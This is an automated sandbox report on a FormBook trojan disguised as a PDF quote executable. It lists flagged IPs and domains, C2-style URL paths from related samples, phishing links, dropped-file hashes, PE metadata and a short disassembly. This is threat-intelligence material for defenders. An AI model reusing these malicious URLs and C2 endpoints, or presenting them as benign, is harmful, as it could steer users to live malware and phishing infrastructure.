                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  75.2.103.23
                                                                  www.webeuz.buzzUnited States
                                                                  16509AMAZON-02UStrue
                                                                  65.21.196.90
                                                                  030002832.xyzUnited States
                                                                  199592CP-ASDEtrue
                                                                  154.82.70.195
                                                                  www.ddzc.storeSeychelles
                                                                  32708ROOTNETWORKSUStrue
                                                                  84.32.84.32
                                                                  b-ambu.comLithuania
                                                                  33922NTT-LT-ASLTtrue
                                                                  172.232.112.221
                                                                  www.weeksee.netUnited States
                                                                  20940AKAMAI-ASN1EUtrue
                                                                  3.33.130.190
                                                                  trencheslondon.storeUnited States
                                                                  8987AMAZONEXPANSIONGBtrue
                                                                  207.154.246.21
                                                                  www.i8ty.xyzUnited States
                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1531713
                                                                  Start date and time:2024-10-11 16:44:28 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 52s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:quote894590895pdf.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@9/7
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 49
                                                                  • Number of non-executed functions: 272
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target csDaoUagQFfwf.exe, PID 2872 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • VT rate limit hit for: quote894590895pdf.exe
                                                                  TimeTypeDescription
                                                                  10:46:41API Interceptor6193631x Sleep call for process: isoburn.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  75.2.103.23AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.heeraka.info/o7wc/
                                                                  PO59458.exeGet hashmaliciousFormBookBrowse
                                                                  • www.webeuz.buzz/okq4/
                                                                  65.21.196.90AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002252.xyz/2ncs/
                                                                  NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002304.xyz/6uay/
                                                                  8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002304.xyz/f06i/
                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002837.xyz/y045/
                                                                  BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                  • www.070001294.xyz/90jl/
                                                                  5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002721.xyz/st0f/?-hF=sZ0LOH4&HPBxr6=OZJ3FWHE8eHsfWE6sR/jZh7GV9NsFGiNmpPQ4eftWQT1hyascoenGoAxdn6KH9WZ2QPSeMYxIK2pDBtCkY1R4v4J1R7l9kCKhVgR/LucEqSnpRqwhg==
                                                                  RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030003302.xyz/1nuz/?LT=aZbPzzPX3H&O47=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4OidZAp+cuSwNE5fzYgJgK5BTkLsTa3g==
                                                                  Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002304.xyz/u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPl
                                                                  rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • www.030002626.xyz/49rz/
                                                                  Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • www.030002803.xyz/l4gu/
                                                                  154.82.70.195NOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                                                                  • www.chatwith.asia/t9rx/
                                                                  84.32.84.32orA5ALUAmWVn51g.exeGet hashmaliciousFormBookBrowse
                                                                  • www.blind4aday.life/qwdc/
                                                                  NjjLYnPSZr.exeGet hashmaliciousFormBookBrowse
                                                                  • www.ainude2.cloud/wzoz/
                                                                  3qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                                  • www.anthonyholland.net/rk2p/
                                                                  8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                  • www.agilizeimob.app/51t8/
                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                  • www.gws-treinamento2.shop/9vaq/
                                                                  BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                  • www.gundrymd.site/0iqj/
                                                                  N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                  • www.es-lidl.online/n2dv/
                                                                  RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.thepeatear.online/lu5k/?O47=ODXYj9SHKZJf+lLWSD5bWs33an1UuUSGPEbmaLn0QSdqh031jXaTcKLg1x+9N8O9by/Xp7E95P2c73d08b4WEpTb1KZHJdxLaSQTbLs0J3NdMMrdrQ==&LT=aZbPzzPX3H
                                                                  8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                  • www.thepeatear.online/pt4m/
                                                                  Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                  • www.pinkpantys.shop/cyro/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.webeuz.buzzPO59458.exeGet hashmaliciousFormBookBrowse
                                                                  • 75.2.103.23
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  NTT-LT-ASLTorA5ALUAmWVn51g.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  NjjLYnPSZr.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  EqszHzzNn5.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                                  • 84.32.84.151
                                                                  3qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  zufmUwylvo.exeGet hashmaliciousXmrigBrowse
                                                                  • 84.32.84.109
                                                                  L7mZZNG72D.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  XMRVhU3b3U.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                  • 84.32.84.32
                                                                  CP-ASDEAL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFnDa0TAMLVO9WtBTyYEZqZA-3DPrnv_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOmYNN4Eos0I-2F5FhDJBI4w4qadztSYeu4ugOMJrD5ZJ3NK5HbR-2B5js4EjZpFmlZJIJ2eepX0b1t3SsV5gyIJGc7CJjeC8X5Wxzv49-2FqOYJzl5qBXpr-2BWwAW7G6cWDOqZN4YK73LjV4xBBNvL9fcHX0SM3SHQjbhXBuKD0dh5WqiuRgt8l7OsZEvxy8UkJaur7KIBjJyVTij7zCSJnYd6mjsUFQl8fAjX9eSOEGKjy2XWh8GHa2xi9VgTVCxGMcn7gM-3DGet hashmaliciousUnknownBrowse
                                                                  • 65.21.29.43
                                                                  BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  http://dmed-industries.comGet hashmaliciousHtmlDropperBrowse
                                                                  • 65.21.29.43
                                                                  ROOTNETWORKSUShttps://ebaite.cn/Get hashmaliciousUnknownBrowse
                                                                  • 154.82.100.141
                                                                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.82.100.177
                                                                  SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elfGet hashmaliciousUnknownBrowse
                                                                  • 154.94.148.198
                                                                  NOAH CRYPT.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.82.70.195
                                                                  LX4CUQO8qI.dllGet hashmaliciousCobaltStrikeBrowse
                                                                  • 154.82.113.115
                                                                  3621103789.exeGet hashmaliciousUnknownBrowse
                                                                  • 154.82.84.197
                                                                  #U540d#U5f55#U5217#U8868_install_.exeGet hashmaliciousGhostRatBrowse
                                                                  • 154.82.92.202
                                                                  #U901a#U77e5#U5982#U4e0b.exeGet hashmaliciousGhostRatBrowse
                                                                  • 154.82.92.202
                                                                  http://telegxawm.com/Get hashmaliciousUnknownBrowse
                                                                  • 154.82.100.126
                                                                  sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.145.246.108
                                                                  AMAZON-02USSETTLEMENT-2023-165092-SP-21.htmlGet hashmaliciousUnknownBrowse
                                                                  • 54.77.0.81
                                                                  http://url5730.bkb-tours.com/ls/click?upn=u001.RGHmK1hbhRj1emqWdiNhLSLfhiHa5Xgj2PgdNFABoTzAEieA-2BAi72IlbwekEjzmy-2Bbvyjc6OaRM0j3Y4D96jZw-3D-3Dl_HJ_IaEOxqgZXlhF-2FWeAthks65A7pC1uGLQoAycHsX43qhoY-2F2AfxoNRV5ePdcjR3Gmg3WGISjAQum9P1-2BACjbElY8P-2BeONKCdI2tniCQVsSVCD-2FsxwCAZ-2BQpOtFFL-2FQRhupVHsOvETyg5eKwS2piuqrqBYS71eHVVSueSBFxE1p9DMjbfAk7jH2aVa8b7PXtZRLu-2F9H7mPlyE1h5QrMK3-2BeYw3ElgCtyzumNXeUQn5iTSgDnH8glp8UH-2B3qyZlDpkszcgav-2Bg91yHAam8NfBR-2FyHHiv6QFOu9Jf5KPsoq-2BvHwM83R2h6zfPuiZCwiBV0x6xGa7QYuUJMXLQtymSaQ9jymf0FXVzo6qCk6-2BR4t2uIKIAiS5u0UF5DyZwT-2FZm6FlaC36a-2FQxXEsmDD8tl5XKFrCNeBuJ9d8HzMYjiAuOiNvju638VdmHFwT5QF4N-2FRbMw1xJ4EatDOFuMlfE1D5F2fExgfdT20s1XlM7n6AVpUmLSDaBXI08KtIAKs4nnVpzbWgYVc5HwgnwLJ-2FnDuveTaRIZcaIXPyYlWuc20qaTwUCV1ad5w3IrcqQQQj36ILX27j9UEWSWjuvKNiG9X9yLS7ZlHBN5E5pBrNn6TRIGLKk-2BDpHVK-2B2itIT6IJ4vcsCPz1imvAM2kGFFVJ0xZZ0Tu5-2BnR2Ywu3a8QDcNLD1QJ6a-2BCrhdN3PaffwSiy9JNSjYSCgPvyFq9fdumL1XMcqf3faT80lxPygL1SYQDRNefwuSx8XcYAJhMd8rw6fZxhd3aJKSQZsrrlDkRKfFcSj569IaIMbg1QNvOKSPwcfFwg8LloZ49bGdLmaLDshtAIO3g1ppfgu1pz6O7yOy7-2F-2FUiy7zLw7H-2BUsXvAxc9I3-2BUUw-3DGet hashmaliciousHTMLPhisherBrowse
                                                                  • 3.160.156.17
                                                                  phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                  • 18.245.86.69
                                                                  Audio.wavqvc.com10098.htmlGet hashmaliciousUnknownBrowse
                                                                  • 18.245.86.6
                                                                  KZNjIWjJBc.exeGet hashmaliciousLokibotBrowse
                                                                  • 54.244.188.177
                                                                  https://stacksports.captainu.comGet hashmaliciousUnknownBrowse
                                                                  • 52.32.28.225
                                                                  https://na2.docusign.net/Signing/EmailStart.aspx?a=8ad02d97-8076-44e2-a042-fe16530c5407&etti=24&acct=c5a8c3f6-b465-4834-92a5-13d8938404ab&er=f0b416b1-58c5-41c9-b4fc-e691bed625b5Get hashmaliciousHTMLPhisherBrowse
                                                                  • 35.160.175.105
                                                                  http://nmacouai-80bf.edohlriapdnoap.workers.devGet hashmaliciousHTMLPhisherBrowse
                                                                  • 13.224.189.91
                                                                  https://docsend.com/view/yw8rtf7gp9v6uesgGet hashmaliciousUnknownBrowse
                                                                  • 18.245.46.10
                                                                  https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fwww.hudl.com%2Fnotifications-tracking%2Ftracker%2FBulkDownloadReady-6151bba290ef2e043c74df7a-6040b153-3f06-4375-9d9d-2976d6f1ac3e-11012597%2Femail%2Flanding%3Fforward%3Dhttps%3A%2F%2Fwww.google.com.sg%2Furl%3Fq%3Damp%2Fs%2Fhosxxrs.com%2F.drogo&data=eJxkkEGL3CAUgH-NcygY9Gl0hKZ0S2qZwy6l0_vyjCYja3RqEjL99yVLoYfeHu87vO99Q2ccBH2WmipgikqtkBrnJQUX8IxaCuHcyXcfTnP3UWnWniWEhmuGDIA1KI1yjVH-fH3--f3y8vrU91_71-fL9Xp5-fZ5fjRTKVMKzVDmT6eli3ksRLIB73FNAWuOeTrYqXZ-rZiJZG6LyYcJ39dbd1vX-0LEEwFLwO773tw2nw5IwOayxjEOuMaSF7pWHN5ingjY9zFUAvbLlt76sudU0P8I6H9TxVvuHIJhYYTApBi09KNGqphkjreCivFIIXRLjTeegtHKq5HjIALlnHFojSZgw4wxEbAJsz_OCjuWumP1RPT_a_8L0SyH4lYTEfYXET3OdwJ2IWBvZXk86vL3u8bXMpU_AQAA___Ij4KF#ask.gcr@zendesk.comGet hashmaliciousUnknownBrowse
                                                                  • 34.254.86.229
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\isoburn.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\quote894590895pdf.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):287232
                                                                  Entropy (8bit):7.9933375154718025
                                                                  Encrypted:true
                                                                  SSDEEP:6144:lq9AjGysdu3AOaih69s+GCe8JVVhsokQqrx4LRC11DxsmD5Hl:8WyyWKT69BG78JVVfkQknDnl
                                                                  MD5:BCFA2C38628DBF403065164F35EE4DDC
                                                                  SHA1:7CAFC49D7B94ADD6287446E983E3B01DB29DF183
                                                                  SHA-256:B200FF84D81C872A0D2F7E1611863F0A5D599230FD9BC3E86727E782A8FD9BAE
                                                                  SHA-512:79734D62C01A78020F8FF157C6D743F715757BA60B3895B18708ECDCC62A86C8A84333FB2723F896E99DD3BDECB3DF2E8C1685C12C5B5B741E411DE2C8217E33
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.j...R0T0h..\.....77...}NI...00M2U54AU3W74GC0UMAR0T00M2U54A.3W7:X.>U.H...1|...]]2uC%XS5"]u. <^;D./WuGA/uZ9.p...8"%7.Y=:i2U54AU3.6=.~P2.|2W..P*.O...oS0.....i-&.*..qR2.f(6[jWS.C0UMAR0T`uM2.45A.k.i4GC0UMAR.T21F3^54.Q3W74GC0UMQG0T0 M2UU0AU3.74WC0UOAR6T00M2U52AU3W74GCPQMAP0T00M2W5t.U3G74WC0UMQR0D00M2U5$AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U5.50K#74G..QMAB0T0`I2U%4AU3W74GC0UMAR.T0PM2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00
                                                                  Process:C:\Users\user\Desktop\quote894590895pdf.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):287232
                                                                  Entropy (8bit):7.9933375154718025
                                                                  Encrypted:true
                                                                  SSDEEP:6144:lq9AjGysdu3AOaih69s+GCe8JVVhsokQqrx4LRC11DxsmD5Hl:8WyyWKT69BG78JVVfkQknDnl
                                                                  MD5:BCFA2C38628DBF403065164F35EE4DDC
                                                                  SHA1:7CAFC49D7B94ADD6287446E983E3B01DB29DF183
                                                                  SHA-256:B200FF84D81C872A0D2F7E1611863F0A5D599230FD9BC3E86727E782A8FD9BAE
                                                                  SHA-512:79734D62C01A78020F8FF157C6D743F715757BA60B3895B18708ECDCC62A86C8A84333FB2723F896E99DD3BDECB3DF2E8C1685C12C5B5B741E411DE2C8217E33
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:.j...R0T0h..\.....77...}NI...00M2U54AU3W74GC0UMAR0T00M2U54A.3W7:X.>U.H...1|...]]2uC%XS5"]u. <^;D./WuGA/uZ9.p...8"%7.Y=:i2U54AU3.6=.~P2.|2W..P*.O...oS0.....i-&.*..qR2.f(6[jWS.C0UMAR0T`uM2.45A.k.i4GC0UMAR.T21F3^54.Q3W74GC0UMQG0T0 M2UU0AU3.74WC0UOAR6T00M2U52AU3W74GCPQMAP0T00M2W5t.U3G74WC0UMQR0D00M2U5$AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U5.50K#74G..QMAB0T0`I2U%4AU3W74GC0UMAR.T0PM2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00M2U54AU3W74GC0UMAR0T00
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.165540322126331
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:quote894590895pdf.exe
                                                                  File size:1'184'768 bytes
                                                                  MD5:967822af836343e721975a8fd39fde4f
                                                                  SHA1:b6d9879f5bdc11fec1d2e296e29affeebd8f1367
                                                                  SHA256:96a5dffe8d545b87cd9038bc05277e2694e01062535c5ef81d380138a20bc652
                                                                  SHA512:31a05a9984bd87217ecf375ad988f770e514620d828293e1b03d80df5ebd8a30bdc3fc6e8a28ba851397aa29c38bd90b6b56fc60c29bc66477bce83b6a3728ff
                                                                  SSDEEP:24576:xCdxte/80jYLT3U1jfsWaj8e7826Xaj4ISQ:ww80cTsjkWaj8e7Ym4M
                                                                  TLSH:A945CF2273DDC361CB669133BF6A77016EBF7C614630B85B2F880D7DA950161262DBA3
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                  Icon Hash:aaf3e3e3938382a0
                                                                  Entrypoint:0x427f4a
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6708F308 [Fri Oct 11 09:42:32 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                  Instruction
                                                                  call 00007FCB408606ADh
                                                                  jmp 00007FCB40853474h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [esp+10h]
                                                                  mov ecx, dword ptr [esp+14h]
                                                                  mov edi, dword ptr [esp+0Ch]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007FCB408535FAh
                                                                  cmp edi, eax
                                                                  jc 00007FCB4085395Eh
                                                                  bt dword ptr [004C31FCh], 01h
                                                                  jnc 00007FCB408535F9h
                                                                  rep movsb
                                                                  jmp 00007FCB4085390Ch
                                                                  cmp ecx, 00000080h
                                                                  jc 00007FCB408537C4h
                                                                  mov eax, edi
                                                                  xor eax, esi
                                                                  test eax, 0000000Fh
                                                                  jne 00007FCB40853600h
                                                                  bt dword ptr [004BE324h], 01h
                                                                  jc 00007FCB40853AD0h
                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                  jnc 00007FCB4085379Dh
                                                                  test edi, 00000003h
                                                                  jne 00007FCB408537AEh
                                                                  test esi, 00000003h
                                                                  jne 00007FCB4085378Dh
                                                                  bt edi, 02h
                                                                  jnc 00007FCB408535FFh
                                                                  mov eax, dword ptr [esi]
                                                                  sub ecx, 04h
                                                                  lea esi, dword ptr [esi+04h]
                                                                  mov dword ptr [edi], eax
                                                                  lea edi, dword ptr [edi+04h]
                                                                  bt edi, 03h
                                                                  jnc 00007FCB40853603h
                                                                  movq xmm1, qword ptr [esi]
                                                                  sub ecx, 08h
                                                                  lea esi, dword ptr [esi+08h]
                                                                  movq qword ptr [edi], xmm1
                                                                  lea edi, dword ptr [edi+08h]
                                                                  test esi, 00000007h
                                                                  je 00007FCB40853655h
                                                                  bt esi, 03h
                                                                  Programming Language:
                                                                  • [ASM] VS2013 build 21005
                                                                  • [ C ] VS2013 build 21005
                                                                  • [C++] VS2013 build 21005
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2013 UPD5 build 40629
                                                                  • [RES] VS2013 build 21005
                                                                  • [LNK] VS2013 UPD5 build 40629
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x58bcc.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1200000x7130.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x8dd2e0x8de00c2c2260508750422d20cd5cbb116b146False0.5729952505506608data6.675875439961112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x8f0000x2e10e0x2e2004513b58651e3d8d87c81a396e5b2f1d1False0.3353340955284553OpenPGP Public Key5.760731648769018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xbe0000x8f740x5200c2de4a3d214eae7e87c7bfc06bd79775False0.1017530487804878data1.1988106744719143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xc70000x58bcc0x58c007c2224cfe2f71c6b72c7205824a145cbFalse0.9264304577464789data7.890734653136315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1200000x71300x72001254908a9a03d2bcf12045d49cd572b9False0.7703536184210527data6.782377328042204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
